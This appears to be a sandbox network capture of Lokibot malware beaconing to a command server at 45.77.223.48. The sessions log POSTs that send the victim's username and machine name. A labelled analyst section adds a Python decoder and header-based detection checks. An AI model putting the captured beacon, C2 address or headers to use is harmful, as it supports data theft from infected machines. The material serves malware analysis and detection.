User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 45.77.223.48
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8425B4CA
Content-Length: 149
Connection: close
Apr 26, 2024 04:57:12.423620939 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:57:16.293761015 CEST | 215 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 02:57:12 GMT
Server: Apache
Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:57:16.293822050 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:57:16.293987036 CEST | 5 | IN | Data Raw: 55 54 46 2d 38
Data Ascii: UTF-8
Apr 26, 2024 04:57:16.294023037 CEST | 6 | IN | Data Raw: 22 20 2f 3e 0a 09
Data Ascii: " />
Apr 26, 2024 04:57:16.294197083 CEST | 71 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:57:16.302445889 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:57:16.302654028 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:57:16.302778959 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:57:16.302870989 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:57:16.303112030 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49743 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 04:57:16.639663935 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 45.77.223.48
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8425B4CA
Content-Length: 149
Connection: close
Apr 26, 2024 04:57:16.828258991 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:57:17.695516109 CEST | 215 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 02:57:16 GMT
Server: Apache
Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:57:17.695570946 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:57:17.695606947 CEST | 11 | IN | Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
Data Ascii: UTF-8" />
Apr 26, 2024 04:57:17.695663929 CEST | 71 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:57:17.704400063 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:57:17.704700947 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:57:17.704804897 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:57:17.704909086 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:57:17.705291986 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:57:17.705385923 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49744 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 04:57:18.033252001 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 45.77.223.48
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8425B4CA
Content-Length: 149
Connection: close
Apr 26, 2024 04:57:18.220884085 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:57:19.100035906 CEST | 215 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 02:57:18 GMT
Server: Apache
Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:57:19.100183964 CEST | 141 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:57:19.107551098 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:57:19.107820988 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:57:19.107978106 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:57:19.108160019 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:57:19.108257055 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:57:19.108298063 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:19.108381033 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 26, 2024 04:57:19.108422041 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49745 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 04:57:19.622306108 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 45.77.223.48
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8425B4CA
Content-Length: 149
Connection: close
Apr 26, 2024 04:57:19.809474945 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:57:20.685904026 CEST | 215 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 02:57:19 GMT
Server: Apache
Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:57:20.686014891 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:57:20.686095953 CEST | 82 | IN | Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:57:20.693898916 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:57:20.694194078 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:57:20.694323063 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:57:20.694431067 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:57:20.694722891 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:57:20.694843054 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:57:20.694936037 CEST | 1289 | IN | Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
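
The 149-byte body POSTed in every session above is the Lokibot check-in beacon, and it is byte-for-byte identical each time. The bytes the page shows read as a little-endian structure: a uint16 version (12 00), a uint32 ID (28 00 00 00), a uint32-length-prefixed ASCII string "ckav.ru", then three records each consisting of a uint16 flag (01 00), a uint32 byte length and a UTF-16LE string ("jones", "528110", "JONES-PC"). The hex dump on the page is cut off after 82 bytes, so the remainder of the body (the part the Data Ascii line renders as 0FDD42EE...) cannot be decoded from what is shown. Note also that the server answers each beacon with the WordPress front page of the blog rather than a command, so the C2 path on this host was either dead or not responding at analysis time. The Python below is an added example, not code from the Joe Sandbox report or from the malware: it decodes the visible bytes and applies the header-level checks (fixed User-Agent, non-standard Content-Key header, Content-Encoding: binary, HTTP/1.0 POST) a proxy or IDS could use to flag this traffic. The sample bytes and request headers are copied from the capture above; the interpretation of the three strings as username, computer name and domain name is an assumption taken from public Lokibot write-ups, not something this report states.

```python
"""Decode the Lokibot beacon and request headers captured above.

Added example; not part of the Joe Sandbox report or the malware itself.
The body bytes are the 82 visible bytes of the 149-byte POST body, so the
parser stops where the visible data stops and returns the rest as `tail`.
"""
import struct
from dataclasses import dataclass

# Constructed from the 'Data Raw' line of the capture above (82 of 149 bytes).
BEACON_HEX = (
    "12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 "
    "6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 "
    "31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 "
    "43 00 00 05 00 00 00 04 00 00 01"
)

# Constructed from the request headers shown in the capture above.
REQUEST_HEADERS = (
    "POST /~blog/?ajax=a HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: 45.77.223.48\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: 8425B4CA\r\n"
    "Content-Length: 149\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Hard-coded User-Agent seen in every session of this report.
LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"


@dataclass
class Beacon:
    version: int        # uint16 LE (0x12 in this capture)
    message_id: int     # uint32 LE (0x28 in this capture); meaning not given on the page
    id_string: str      # uint32-length-prefixed ASCII ("ckav.ru")
    strings: list       # flag(uint16)=1, len(uint32), UTF-16LE payload, repeated
    tail: bytes         # bytes after the last parsable record (page truncates the body)


def parse_beacon(data: bytes) -> Beacon:
    """Walk the little-endian length-prefixed layout visible in the capture."""
    off = 0
    version, message_id = struct.unpack_from("<HI", data, off)
    off += 6
    (n,) = struct.unpack_from("<I", data, off)
    off += 4
    id_string = data[off:off + n].decode("ascii")
    off += n

    strings = []
    # Each string record: uint16 flag (1 = wide string), uint32 byte length, payload.
    while off + 6 <= len(data):
        flag, n = struct.unpack_from("<HI", data, off)
        if flag != 1 or off + 6 + n > len(data):
            break  # not a string record, or it runs past the visible bytes
        off += 6
        strings.append(data[off:off + n].decode("utf-16-le"))
        off += n
    return Beacon(version, message_id, id_string, strings, data[off:])


def lokibot_indicators(raw_request: str) -> dict:
    """Header-level checks a proxy or IDS can apply without decoding the body."""
    request_line, _, rest = raw_request.partition("\r\n")
    headers = {}
    for line in rest.split("\r\n"):
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {
        "user_agent": headers.get("user-agent") == LOKIBOT_USER_AGENT,
        "content_key": "content-key" in headers,  # non-standard header
        "binary_encoding": headers.get("content-encoding") == "binary",
        "http10_post": request_line.startswith("POST ")
        and request_line.endswith("HTTP/1.0"),
    }


def analyse() -> dict:
    """Decode the constructed sample and summarise what a responder would log."""
    beacon = parse_beacon(bytes.fromhex(BEACON_HEX))
    hits = lokibot_indicators(REQUEST_HEADERS)
    return {
        "version": beacon.version,
        "message_id": beacon.message_id,
        "id_string": beacon.id_string,
        # Assumed mapping (public Lokibot write-ups, not this page):
        # username, computer name, domain/workgroup name.
        "strings": beacon.strings,
        "tail_len": len(beacon.tail),
        "all_header_indicators": all(hits.values()),
    }


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```

The header checks are deliberately independent of the body: the body is tiny and static, but the Content-Key header and the 1990s-era User-Agent string are what distinguish this POST from ordinary traffic to a WordPress site on port 80, and both survive when the C2 host or path changes.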


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 04:57:21.056286097 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 45.77.223.48
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8425B4CA
Content-Length: 149
Connection: close
Apr 26, 2024 04:57:21.244206905 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:57:22.132865906 CEST | 215 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 02:57:21 GMT
Server: Apache
Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:57:22.132925987 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
